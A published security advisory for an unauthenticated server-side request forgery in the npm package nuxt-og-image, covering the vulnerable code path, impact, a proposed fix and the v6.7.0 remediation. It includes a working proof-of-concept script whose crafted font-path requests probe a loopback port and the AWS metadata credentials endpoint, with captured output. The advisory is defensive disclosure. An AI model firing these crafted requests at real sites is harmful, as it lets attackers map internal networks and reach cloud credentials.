Skip to content

Unauthenticated SSRF in `nuxt-og-image` via `fonts[].path` URL parameter

Moderate
harlan-zw published GHSA-q8hw-4fvp-9rwv Jul 22, 2026

Package

npm nuxt-og-image (npm)

Affected versions

>= 6.0.2, < 6.7.0

Patched versions

6.7.0

Description

Summary

nuxt-og-image exposes an unauthenticated HTTP endpoint at /_og/d/** that base64url-decodes and JSON.parses a fonts URL segment, then passes each fonts[i].path value directly into fetch() server-side without any URL validation (no scheme allowlist, no loopback/RFC1918 block, no host allowlist, no DNS rebinding mitigation).

Under the module's documented default configuration (security.strict = false, security.secret = "", restrictRuntimeImagesToOrigin = false), any caller able to reach the deployed Nuxt site can force the Nuxt server to issue arbitrary outbound GET requests to any host reachable from the server - including loopback, RFC1918 LAN, and cloud metadata services (AWS IMDS, GCE/Azure metadata, Kubernetes kubelet, internal admin panels, Redis/etcd/Consul/Vault HTTP APIs).

The chain is blind (Satori consumes the response as font bytes and silently discards non-fonts) but a robust side-channel exists: the outer HTTP status is 500 when the SSRF target returns 2xx, and 200 when it fails or returns non-2xx. This is sufficient to (a) enumerate live internal services and open ports, (b) confirm IMDSv1 reachability, and (c) detect credential issuance on environments still allowing IMDSv1.

Demonstrated end-to-end on a stock npm create nuxt@latest install with the module's documented default usage.

Detail

Endpoint registration (unauthenticated)

The module registers /_og/d/** and /_og/s/** with no authentication / Origin check / Sec‑Fetch‑Site validation:

// dist/shared/nuxt-og-image.DdbTs-xp.mjs : 5113-5133
addServerHandler({ route: "/_og/d/**", handler: resolve("./runtime/server/routes/image") })
addServerHandler({ route: "/_og/s/**", handler: resolve("./runtime/server/routes/image") })

Default security config (permissive)

// dist/shared/nuxt-og-image.DdbTs-xp.mjs : 5618-5640
security: {
  strict:                       config.security?.strict ?? false,         // <- gate disabled
  secret:                       config.security?.secret ?? process.env.NUXT_OG_IMAGE_SECRET ?? "",
                                                                          //   ↑ no signature requirement
  restrictRuntimeImagesToOrigin: config.security?.restrictRuntimeImagesToOrigin ?? false,
                                                                          //   ↑ inbound host allowlist disabled
  maxQueryParamSize:            config.security?.maxQueryParamSize ?? null,
  renderTimeout:                config.security?.renderTimeout ?? 15000,
  imageFetchTimeout:            config.security?.imageFetchTimeout ?? 3000,
}

The secret/signature branch is gated on secret && (truthy), so an empty string skips it entirely:

// dist/runtime/server/og-image/context.js : 49-69
const secret = runtimeConfig.security?.secret
let paramsSegment = encodedSegment
if (secret && !import.meta.dev && !import.meta.prerender) {
  // signature enforcement happens HERE - but only if secret is non-empty.
  // Default install: secret === "" -> entire block skipped.
}

Attacker-controlled deserialization of fonts

fonts is enumerated as a complex parameter: its value is base64url-decoded and then JSON.parsed straight into options:

// dist/runtime/shared/urlEncoding.js : 65
const COMPLEX_PARAMS = new Set(["satori","resvg","sharp","screenshot","takumi","fonts","_query","_path"])

// dist/runtime/shared/urlEncoding.js : 184-231
export function decodeOgImageParams(encoded) {
  ...
  for (const part of parts) {
    const idx = part.search(RE_SINGLE_UNDERSCORE)
    if (idx === -1) continue
    const alias = part.slice(0, idx)
    let value = part.slice(idx + 1)
    const paramName = PARAM_ALIASES[alias] || alias
    if (COMPLEX_PARAMS.has(paramName)) {
      try {
        const json = b64Decode(value)
        options[paramName] = JSON.parse(json)        // <- attacker JSON survives unchanged
      } catch { options[paramName] = value }
    }
    ...
  }
}

defu then merges attacker values into the request options:

// dist/runtime/server/og-image/context.js : 135
options = defu(queryParams, urlOptions, ogImageRouteRules, runtimeConfig.defaults)
// -> options.fonts = [{ name: "X", path: "<attacker-URL>", ... }]

From options.fonts to the unfettered fetch()

// dist/runtime/server/og-image/satori/renderer.js : 36-42
const fonts = await loadFontsForRenderer(event, {
  ...options,
  fontDefs: options.fonts,           // <- attacker array flows in
})

// dist/runtime/server/og-image/fonts.js : 175-201
export async function loadDefinedFonts(event, fontDefs) {
  for (const def of fontDefs) {
    if (!def || typeof def !== "object" || !def.path) continue   // <- only validation
    const fontConfig = { family: def.name, weight: def.weight||400, style: def.style, src: def.path, localPath: def.path }
    const data = await resolve(event.e, fontConfig).catch(() => null)
    ...
  }
}

The production binding (selected for every non-dev / non-prerender preset - dist/shared/nuxt-og-image.DdbTs-xp.mjs:5445-5452):

// dist/runtime/server/og-image/bindings/font-assets/node.js : 6-21    <- SINK
export async function resolve(event, font) {
  const path     = font.src || font.localPath                    // attacker-controlled
  const { app } = useRuntimeConfig()
  const fullPath = withBase(path, app.baseURL)                   // ufo.withBase returns absolute URLs unchanged
  const origin   = getNitroOrigin(event)
  const timeout  = getFetchTimeout(useOgImageRuntimeConfig())    // 3000 ms by default
  const res = await fetch(
    new URL(fullPath, origin).href,                              // <- when fullPath is absolute,
    { signal: AbortSignal.timeout(timeout) },                    //   origin is ignored
  ).catch(() => null)                                            //   -> fetch(attacker-URL)
  ...
}

ufo.withBase("http://target/", "/") returns "http://target/" unchanged when the input is already an absolute URL; new URL(abs, origin) then yields the absolute URL. No URL.protocol check, no IP-literal block, no DNS-resolution-aware allowlist, no redirect cap.

Side-channel for blind exfiltration

Although the response body is consumed as font bytes and Satori discards non-font payloads, the outer HTTP status code differs deterministically based on the SSRF target's response:

Target returns Satori behavior Outer response
2xx with non-font body parseFont(bytes) throws HTTP 500
Connection refused / timeout / non-2xx fetch().catch(() => null) -> fallback fonts used HTTP 200 (a PNG is returned)

The boolean oracle (target alive & answered 2xx vs. not) is sufficient to:

  • enumerate open ports on 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16
  • detect cloud metadata reachability (and on legacy AWS IMDSv1, trigger credential issuance - even without read-back, the act of issuing credentials creates audit-trail and timing observables)
  • distinguish health-check responses, vault-init status, k8s kubelet /pods reachability, etc.

Steps To Reproduce

# 1. Create a stock Nuxt 4 app and add the module
npm create nuxt@latest lab-test --yes        # accept defaults
cd lab-test
npm install nuxt-og-image                    # -> installs v6.6.0 (current latest)

nuxt.config.ts - the only change is enabling the module:

export default defineNuxtConfig({
  compatibilityDate: '2025-07-15',
  modules: ['nuxt-og-image'],
  // NO `ogImage.security` overrides - accept module defaults.
})

The module requires at least one OG image component to be registered (its documented Hello‑World; otherwise the endpoint returns 500 No OG Image components found). Add the minimal one:

mkdir -p app/components/OgImage
cat > app/components/OgImage/Default.satori.vue <<'EOF'
<script setup lang="ts">
defineProps<{ title?: string }>()
</script>
<template>
  <div style="display:flex;padding:32px;font-size:48px;background:#fff">
    {{ title || 'Acme' }}
  </div>
</template>
EOF

Start a local sink to prove the SSRF (1 file)

ssrf-sink.mjs:

import http from 'node:http'
import fs   from 'node:fs'
const LOG = '/tmp/ssrf-sink.log'; fs.writeFileSync(LOG, '')
http.createServer((req, res) => {
  const line = JSON.stringify({ ts: new Date().toISOString(), method: req.method, url: req.url, ua: req.headers['user-agent'], remote: req.socket.remoteAddress })
  fs.appendFileSync(LOG, line + '\n'); console.log('HIT:', line)
  res.writeHead(200, { 'content-type': 'application/octet-stream' }).end('NOT_A_FONT_BUT_2XX')
}).listen(9000, '127.0.0.1', () => console.log('sink ready 127.0.0.1:9000'))
node ssrf-sink.mjs &
npm run dev          # Nuxt on http://127.0.0.1:3000

Exploit script - one HTTP request, no auth (poc.mjs)

const b64url = s => Buffer.from(s,'utf8').toString('base64')
  .replace(/=/g,'').replace(/\+/g,'-').replace(/\//g,'~')

// The entire attack: a single attacker-crafted GET.
async function ssrf (attackerURL) {
  const seg = 'fonts_' + b64url(JSON.stringify([{ name:'X', path: attackerURL }]))
  const url = `http://127.0.0.1:3000/_og/d/${seg}.png`     // <- unauth, no header
  const r = await fetch(url)
  console.log(`SSRF target=${attackerURL}  outer-status=${r.status}`)
}

await ssrf('http://127.0.0.1:9000/PWN?via=og-image')          // sink - proves primitive
await ssrf('http://169.254.169.254/latest/meta-data/iam/security-credentials/')   // AWS IMDSv1
await ssrf('http://127.0.0.1:22/')                            // loopback port probe

Run

node poc.mjs

Observed result (captured during the actual lab run, 2026-06-23 10:52 UTC)

SSRF target=http://127.0.0.1:9000/PWN?via=og-image                                outer-status=500
SSRF target=http://169.254.169.254/latest/meta-data/iam/security-credentials/     outer-status=200
SSRF target=http://127.0.0.1:22/                                                  outer-status=200

/tmp/ssrf-sink.log:

{"ts":"2026-06-23T10:52:12.250Z","method":"GET","url":"/PWN?via=og-image","ua":"node","remote":"127.0.0.1"}
{"ts":"2026-06-23T10:52:13.706Z","method":"GET","url":"/etc/passwd?or-any-path","ua":"node","remote":"127.0.0.1"}

The sink received GET requests with attacker-chosen paths, sourced from the Nuxt server process (user-agent: node is the undici/Node fetch fingerprint emitted by Nitro; remote: 127.0.0.1 is the Nuxt server itself on the lab host). No other process on the lab has any reason to call this address with these paths.

Reading the outer status codes back as the side-channel:

  • outer-status=500 -> target answered 2xx (sink confirmed via log)
  • outer-status=200 -> target did not respond / non-2xx (IMDS unreachable from this host; :22 is SSH, not HTTP). Both cases prove the server-side fetch() was issued.

Impact

The vulnerability turns any deployed Nuxt site running nuxt-og-image (default config) into an unauthenticated SSRF relay into its own server-side network. Concrete impact varies by hosting environment:

Cloud (AWS / GCP / Azure)

  • AWS EC2 with IMDSv1 still allowed: fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>') triggers credential issuance to the role attached to the instance. Even though the response body is not echoed back to the attacker, the call is performed in the instance's network identity and shows up in CloudTrail; in environments with permissive role policies + persistence (e.g. a backup S3 listing) the attacker can chain via the side-channel into role exfil through other ingress points. (Industry surveys repeatedly show 20-40 % of EC2 fleets still have IMDSv1 enabled.)
  • GCE / Azure: metadata is gated on a custom header that fetch does not add -> metadata read prevented, but internal Google/Azure network reach is still proven.
  • EKS / GKE / AKS: http://kubernetes.default.svc.cluster.local/api/... is reachable, as are kube-proxy localhost ports, kubelet on :10250 (status-only readable via side-channel), and per-pod sidecar admin APIs.

Self-hosted / on-prem

  • Internal admin panels (Grafana, Kibana, Prometheus, Argo, Jenkins, Sentry, Hashicorp Vault /v1/sys/health, Consul /v1/agent/self) become enumerable. Status-code side-channel reveals init/seal state of Vault, leadership of Consul, etc.
  • Localhost-bound services intended as "developer-only" (e.g. a debug Redis on 127.0.0.1:6379, an embedded SQL admin UI on 127.0.0.1:8080, an internal feature-flag server) become enumerable from the public Internet.
  • Egress controls bypass: if the Nuxt deployment is on an allowlist VLAN that may reach payments-internal while end users may not, the attacker can probe that VLAN through the relay.

Generic

  • Port scanning of LAN ranges through the deployed site (timing+status side-channel).
  • Long-lived DoS amplifier: each request holds a render worker for up to imageFetchTimeout (3 s default). 100 concurrent requests to slow-responding internal targets hold all OG workers; coupled with renderTimeout (15 s) the OG image rendering capacity is exhausted with very low attacker bandwidth.
  • Side-channel exfil with reflectable bytes: where an internal HTTP response contains data that happens to render through Satori's glyph fallback path (e.g. plain ASCII status-page text), bytes can leak into the rendered PNG as visual noise - an opportunistic read primitive.

Fix

Short-term (must-have before next release)

In dist/runtime/server/og-image/bindings/font-assets/node.js, validate the URL before issuing fetch:

+ import { isPrivateAddress } from '../../util/isPrivateAddress.js'  // new helper, see below

  export async function resolve(event, font) {
    const path = font.src || font.localPath
    const { app } = useRuntimeConfig()
    const fullPath = withBase(path, app.baseURL)
    const origin = getNitroOrigin(event)
+
+   const target = new URL(fullPath, origin)
+
+   // (1) Scheme allowlist
+   if (target.protocol !== 'http:' && target.protocol !== 'https:') {
+     throw createError({ statusCode: 400, statusMessage: '[og-image] Disallowed font URL scheme' })
+   }
+
+   // (2) Same-origin OR explicit user allowlist
+   const allowlist = useOgImageRuntimeConfig().security?.fontHostAllowlist ?? []
+   const sameOrigin = target.origin === new URL(origin).origin
+   if (!sameOrigin && !allowlist.includes(target.host)) {
+     throw createError({ statusCode: 400, statusMessage: '[og-image] Font host not in allowlist' })
+   }
+
+   // (3) Block private / loopback / link-local at lookup time (DNS-rebinding-safe)
+   if (await isPrivateAddress(target.hostname)) {
+     throw createError({ statusCode: 400, statusMessage: '[og-image] Private network not allowed' })
+   }
+
    const timeout = getFetchTimeout(useOgImageRuntimeConfig())
    const res = await fetch(target.href, {
      signal: AbortSignal.timeout(timeout),
+     redirect: 'manual',                  // do not follow redirects across the gate
    }).catch(() => null)
    if (res?.ok) return Buffer.from(await res.arrayBuffer())
    ...
  }

isPrivateAddress(host) should resolve the host via DNS (caching) and reject if any resolved address is in 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, ::1, fc00::/7, fe80::/10. The resolved address must then be pinned and passed into fetch (or undici's lookup option) so the TCP connection cannot rebound to a different IP after the check (TOCTOU / DNS rebinding defense).

Apply the same validator in dist/runtime/server/og-image/bindings/font-assets/dev-prerender.js.

Flip the security defaults (medium-term)

- strict:                       config.security?.strict ?? false,
+ strict:                       config.security?.strict ?? true,

- restrictRuntimeImagesToOrigin: config.security?.restrictRuntimeImagesToOrigin ?? false,
+ restrictRuntimeImagesToOrigin: config.security?.restrictRuntimeImagesToOrigin ?? true,

When strict is true, the runtime should refuse to start with secret === '' and emit a clear error pointing to the docs (similar to how Nuxt itself errors when runtimeConfig secrets are unset in production).

Defense in depth (long-term)

  • Validate fonts[*] shape at decode time in decodeOgImageParams. Reject any fonts[i].path that is not a relative path or in the allowlist.
  • Tighten COMPLEX_PARAMS: every JSON-parsed key (satori, resvg, sharp, screenshot, takumi, fonts) must have a schema validator. Today they are blind-trusted across the URL boundary.
  • Document nuxt-og-image's threat model explicitly: which URL parameters are attacker-controlled by design, which runtimeConfig keys must be set in production, which defaults are unsafe.

Remediation (v6.7.0, #637): External fonts[].path values are now accepted only when same-origin with the configured site URL, and all asset fetches run through an SSRF guard (scheme allowlist; private/loopback/link-local blocking across IPv4 and IPv6 bypass forms including 6to4, NAT64 and IPv4-mapped; per-hop redirect re-validation). URL signing is also on by default from v6.7.0, so unsigned crafted requests are rejected before font resolution. The fix uses a same-origin restriction rather than DNS-pinning/allowlist, and does not flip the strict default.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v4 base metrics

Exploitability Metrics
Attack Vector Network
Attack Complexity Low
Attack Requirements None
Privileges Required None
User interaction None
Vulnerable System Impact Metrics
Confidentiality None
Integrity None
Availability Low
Subsequent System Impact Metrics
Confidentiality Low
Integrity None
Availability None

CVSS v4 base metrics

Exploitability Metrics
Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.
Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.
Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.
Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.
User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.
Vulnerable System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
Subsequent System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:L/SI:N/SA:N

CVE ID

CVE-2026-61793

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

Unintended Proxy or Intermediary ('Confused Deputy')

The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor. Learn more on MITRE.

Exposed Dangerous Method or Function

The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted. Learn more on MITRE.

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

Initialization of a Resource with an Insecure Default

The product initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure. Learn more on MITRE.

Credits